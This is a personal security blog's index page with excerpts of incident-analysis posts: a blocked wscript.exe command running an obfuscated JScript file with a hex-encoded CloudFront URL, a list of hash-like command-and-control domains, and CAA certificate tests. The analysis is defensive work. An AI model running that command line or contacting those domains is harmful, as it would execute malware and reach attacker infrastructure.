I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this wasContinue reading “About:me”

Examining strange wscript behavior

We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently: wscript.exe “C:ProgramData{18E0DD83-92A2-5745-1464-C9078E2642C9}domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk” I took a copy of the domo.txt script and uploaded to VT: I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = According toContinue reading “Examining strange wscript behavior”


Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing: dfbfb63dcaff96fbe9616fb806e4799f.com8d46980d994cc618aeed127df1b5c86d8acd86ce.info07bf396c25d9a624281c97752aee0247e4229b84.xyz07bf396c25d9a624281c97752aee0247e4229b84.com07bf396c25d9a624281c97752aee0247e4229b84.infod234304f57772cf6be78ab6c24a65c91ce896fff.xyzd2343

I’m now the proud owner of these domains: Why would I purchase such strange looking domains you ask? It all started long ago, while working for my enterprise. I saw some activity flagged by OpenDNS / Umbrella for some CnC traffic bound for these domains. It was being blocked but as IContinue reading “”

CAA Test Results

As promised, I’ve been testing Certification Authority Authorization (CAA) with some Certificate Authorities and here’s what I found so far: Amazon Certificate Manager (ACM) It does not appear they honor the IODEF since I didn’t receive an email. Let’s Encrypt appears to also block issuance: Let’s Encrypt (using lego) 2018/12/29 16:44:30 Could not obtain certificatesContinue reading “CAA Test Results”


Something went wrong. Please refresh the page and/or try again.

Follow My Blog

Get new content delivered directly to your inbox.

%d bloggers like this: